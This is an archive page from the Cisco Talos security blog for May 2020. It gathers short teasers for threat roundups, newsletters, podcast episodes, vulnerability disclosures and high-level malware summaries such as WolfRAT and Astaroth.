Friday, May 29, 2020

Threat Roundup for May 22 to May 29


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 22 and May 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 28, 2020

Threat Source newsletter for May 28, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We need to start things off by wishing a Happy Birthday to Beers with Talos! The first episode was released on May 12, 2017. To celebrate, we have a new episode out this week and are working on another “In Between” for next week.

Send in your questions on Twitter to @TalosSecurity to have them answered on the show. 

Dynamic Data Resolver (DDR) — IDA Plugin 1.0 beta

10/20/20 Update: A new version of this software and associated blog can be found here

Executive summary

Static reverse-engineering in IDA can often be problematic. Certain values are calculated at run time, which makes it difficult to understand what a certain basic block is doing. If you try to perform dynamic analysis by debugging a piece of malware, the malware will often detect it and start behaving differently. Today, Cisco Talos is releasing the 1.0 beta version of Dynamic Data Resolver (DDR) — a plugin for IDA that makes reverse-engineering malware easier. DDR is using instrumentation techniques to resolve dynamic values at runtime from the sample. For the 1.0 release, we have fixed a couple of bugs, ported it to the latest IDA version, added multiple new features, plus a new installer script that automatically resolves all dependencies. 

Tuesday, May 26, 2020

Beers with Talos Ep. #82: Talos IR quarterly threat trends

Beers with Talos (BWT) Podcast episode No. 82 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 8, 2020

Brad Garnett from Cisco Talos Incident Response joins us today to talk about DFIR, the Talos Quarterly Trends Report, and how a high-speed police chase on reality TV kick-started his DFIR career. That’s not even clickbait, for real. After Brad drops a quick IR trends briefing on us, the crew drills down on some key findings.

We are taking your questions from Twitter so keep sending them for the next "The In-Between" episode — @TalosSecurity #BWT.

Thursday, May 21, 2020

Threat Source newsletter for May 21, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Beers with Talos chugs on during quarantine with the latest episode of “The In-Between.” Once again, the hosts talk about everything but security, answering listener questions from Twitter.

The most pressing threat we have this week is WolfRAT, a variant of the DenDroid Android malware. WolfRAT is attempting to exploit users on different messaging apps like Facebook Messenger, WhatsApp and Line — specifically, users in Thailand.

And if you’re really ready to get into security nitty-gritty, we have a deep dive on a vulnerability some Cisco researchers recently discovered that leave cars with on-board computers open to attack.  

Vulnerability Spotlight: Memory corruption vulnerability in GNU Glibc leaves smart vehicles open to attack

By Sam Dytrych and Jason Royes.

Executive summary


Modern automobiles are complex machines, merging both mechanical and computer systems under one roof. As automobiles become more advanced, additional sensors and devices are added to help the vehicle understand its internal and external environments. These sensors provide drivers with real-time information, connect the vehicle to the global fleet network and, in some cases, actively use and interpret this telemetry data to drive the vehicle.

These vehicles also frequently integrate both mobile and cloud components to improve the end-user experience. Functionality such as vehicle monitoring, remote start/stop, over-the-air-updates and roadside assistance are offered to the end-user as additional services and quality of life improvements.

All these electronic and computer systems introduce a lot of different attack vectors in connected vehicles – Bluetooth, Digital Radio (HD Radio/DAB), USB, CAN bus, Wi-Fi and, in some cases, cellular. However, like any other embedded system, connected vehicles are exposed to cyber attacks and security threats. Some of the threats that connected vehicles face include software vulnerabilities, hardware-based attacks and even remote control of the vehicle. During some recent research, Cisco's Customer Experience Assessment & Penetration Team (CX APT) discovered a memory corruption vulnerability in GNU libc for ARMv7, which leaves Linux ARMv7 systems open to exploitation. This vulnerability is identified as TALOS-2020-1019/CVE-2020-6096.

CX APT represents the integration of experts from the NDS, Neohapsis, and Portcullis acquisitions. This team provides a variety of security assessment and attack simulation services to customers around the globe. The CX APT IoT security practice specializes in identifying vulnerabilities in connected vehicle components. For more on this vulnerability, you can read the full advisory here. CX APT worked with Cisco Talos to disclose the vulnerability and the libc library maintainers plan to release an update that fixes this vulnerability in August.

Vulnerability Spotlight: Authentication bypass vulnerability in some Epson projectors

Yuri Kramarz of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

The Epson EB-1470UI Projector contains an authentication bypass vulnerability in its web control functionality. This projector allows users to control it over the web. However, an adversary could trick a
user into opening a specifically crafted web page, which would allow the attacker to bypass authentication and giving them full read/write configuration access.

Cisco Talos is disclosing this vulnerability after Epson did not patch it per Cisco’s 90-day deadline. After initially acknowledging receipt of the issue, Talos was unable to get a reply from the vendor to any follow-up requests. Update: Epson has patched this issue in October 2020, please click here for the patch and the list of impacted devices. Read more about the Cisco vulnerability disclosure policy here.

Tuesday, May 19, 2020

The wolf is back...




By Warren Mercer, Paul Rascagneres and Vitor Ventura.

News summary

  • Thai Android devices and users are being targeted by a modified version of DenDroid we are calling "WolfRAT," now targeting messaging apps like WhatsApp, Facebook Messenger and Line.
  • We assess with high confidence that this modified version is operated by the infamous Wolf Research.
  • This actor has shown a surprising level of amateur actions, including code overlaps, open-source project copy/paste, classes never being instanced, unstable packages and unsecured panels.

Monday, May 18, 2020

Beers with Talos Ep. #81: "The In-Between," Vol. 3

Beers with Talos (BWT) Podcast episode No. 81 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded May 1, 2020

Sammi is back and the rest of the crew is here to hang out and chat. As is The In-Between Way — we avoid discussing security at all. These episodes are all about just keeping in touch and having some fun. Despite Joel forgetting his one job on this podcast, we are taking your (sometimes crazy) questions from Twitter on these episodes, so keep sending them for the next "The In-Between" episode — @TalosSecurity #BWT.

Vulnerability Spotlight: Multiple vulnerabilities in Nitro Pro PDF reader

Aleksandar Nikolic and Cory Duplantis of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered two code execution vulnerabilities and an information disclosure flaw in Nitro Pro PDF reader. Nitro PDF allows users to save, read, sign and edit PDFs on their computers.
The software contains vulnerabilities that could allow adversaries to carry out a variety of actions.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Nitro PDF to ensure that these issues are resolved and that an update is available for affected customers.

Friday, May 15, 2020

Threat Roundup for May 8 to May 15


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 8 and May 15. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 14, 2020

The basics of a ransomware infection as Snake, Maze expands

By Joe Marshall (@ImmortanJo3)



There have recently been several high-profile ransomware campaigns utilizing Maze and Snake malware. From critical medical supply companies, to large logistics firms, many businesses of all sizes have fallen victim to this cybercrime wave.

Threat Source newsletter for May 14, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Our main focus this week is on Astaroth. This is a malware family that has been targeting Brazil with a variety of lures, including COVID-19-themed documents, for the past nine to 12 months. Astaroth implements a robust series of anti-analysis/evasion techniques, among the most thorough we've seen recently. We have the full rundown of the threat and our protections against it.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week. 

Tuesday, May 12, 2020

Vulnerability Spotlight: Code execution vulnerability in Microsoft Excel

Marcin “Icewall” Noga of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered a code execution vulnerability in some versions of Microsoft Excel. An attacker could exploit this vulnerability by tricking the victim into opening a specially crafted Excel file,
triggering a use-after-free condition and allowing them to execute remote code on the victim machine.

Microsoft disclosed and patched this bug as part of their monthly security update Tuesday. For more on their updates, read the full blog here.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Microsoft to ensure that these issues are resolved and that an update is available for affected customers.

Microsoft Patch Tuesday — May 2020: Vulnerability disclosures and Snort coverage

By Jon Munshaw. 

Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 111 vulnerabilities. Fifteen of the flaws Microsoft disclosed are considered critical. There are also 95 "important" vulnerabilities and six low- and moderate-severity vulnerabilities each.

Cisco Talos specifically disclosed CVE-2020-0901, a code execution vulnerability in Excel. This month’s security update also covers security issues in a variety of Microsoft services and software, including SharePoint, Media Foundation and the Chakra scripting engine.

Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the full Snort rule advisory here.

Vulnerability Spotlight: Remote code execution vulnerabilities in Adobe Acrobat Reader

Aleksandar Nikolic of Cisco Talos discovered this vulnerability. Blog by Jon Munshaw.

Cisco Talos recently discovered two remote code execution vulnerabilities in Adobe Acrobat Reader. Acrobat supports a number of features, including the ability to process embedded JavaScript. These flaws specifically exist in the way the software handles the destruction of annotations from inside event handlers. An attacker could trigger these exploits by tricking a user into opening a malicious file or web page. The adversary could then use that to obtain the ability to execute arbitrary code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Monday, May 11, 2020

Threat Spotlight: Astaroth — Maze of obfuscation and evasion reveals dark stealer

By Nick Biasini, Edmund Brumaghin and Nick Lister.
  • Cisco Talos is detailing an information stealer, Astaroth, that has been targeting Brazil with a variety of lures, including COVID-19 for the past nine to 12 months.
  • Complex maze of obfuscation and anti-analysis/evasion techniques implemented by Astaroth inhibit both detection and analysis of the malware family.
  • Creative use of YouTube channel descriptions for encoded and encrypted command and control communications (C2) implemented by Astaroth.

What's new?

  • Astaroth implements a robust series of anti-analysis/evasion techniques, among the most thorough we've seen recently.
  • Astaroth is effective at evading detection and ensuring, with reasonable certainty, that it is only being installed on systems in Brazil and not on sandboxes and researchers systems.
  • Novel use of YouTube channels for C2 helps evade detection, by leveraging a commonly used service on commonly used ports.

How did it work?

  • The user receives an email message that has an effective lure, in this campaign all emails were in Portuguese and targeted Brazilian users.
  • The user clicks a link in the email, which directs the user to an actor owned server
  • Initial payload (ZIP file with LNK file) downloaded from Google infrastructure.
  • Multiple tiers of obfuscation implemented before LoLBins (ExtExport/Bitsadmin) used to further infection.
  • Extensive anti-analysis/evasion checks done before Astaroth payload delivered.
  • Encoded and encrypted C2 domains pulled from YouTube channel descriptions.

So what?

  • Astaroth is another example of the level of sophistication crimeware is consistently achieving.
  • This level of anti-analysis/evasion should be noted, as the likelihood of this spreading beyond just Brazil is high.
  • Organizations need to be prepared for these evasive and effective information stealers and prepared to defend against the sophisticated attack.
  • Another example of how most adversaries are using COVID-19 themed campaigns to increase effectiveness.

Friday, May 8, 2020

Threat Roundup for May 1 to May 8


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 1 and May 8. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Thursday, May 7, 2020

Threat Source newsletter for May 7, 2020


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week. 

With all of us working from home, Beers with Talos episodes are coming out faster than ever. This week, we have an actual episode with security discussions rather than the “Cats” movie, including the importance of split-tunneling.  

There are also two Vulnerability Spotlights out alerting users of bugs in 3S CODESYS and Accusoft ImageGear

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week. 

Wednesday, May 6, 2020

Beers with Talos Ep. #80: Working securely in a new (not yet) normal

Beers with Talos (BWT) Podcast episode No. 80 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded April 24, 2020

Matt isn’t with us today, but the rest of the crew discusses some current security issues in our new work-from-home environment, including some better-than-just-the-basics advice on how to protect yourself and your organization’s data. We go a bit more in-depth on VPN and explain how VPNs work, how they protect you, and more importantly, how they DON’T protect you. The key takeaway of this podcast, however, is that we need to start a campaign to formally recognize the legitimacy of Social Mulligans (this counts as a trademark, right?).

Send us your questions for the next "The In-Between" episode — @TalosSecurity #BWT.

Vulnerability Spotlight: Code execution vulnerability in 3S CODESYS


Carl Hurd of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered an exploitable code execution vulnerability in 3S’ CODESYS Control SoftPLC runtime system. The system allows any embedded or PC device to convert into an IEC 61131-3-
complaint industrial controller. A specific task in this system contains a code execution vulnerability that an attacker could exploit by sending a malicious packet to the victim machine. 

In accordance with our coordinated disclosure policy, Cisco Talos worked with 3S to ensure that these issues are resolved and that an update is available for affected customers.

Tuesday, May 5, 2020

Vulnerability Spotlight: Multiple code execution vulnerabilities in Accusoft ImageGear

Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Cisco Talos recently discovered four code execution vulnerabilities in Accusoft ImageGear. The ImageGear library is a document-imaging developer toolkit to assist users with image conversion, 
creation, editing and more. There are vulnerabilities in certain functions of ImageGear that could allow an attacker to execute code on the victim machine.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Accusoft to ensure that these issues are resolved and that an update is available for affected customers.

Friday, May 1, 2020

Threat Roundup for April 24 to May 1


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between April 24 and May 1. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.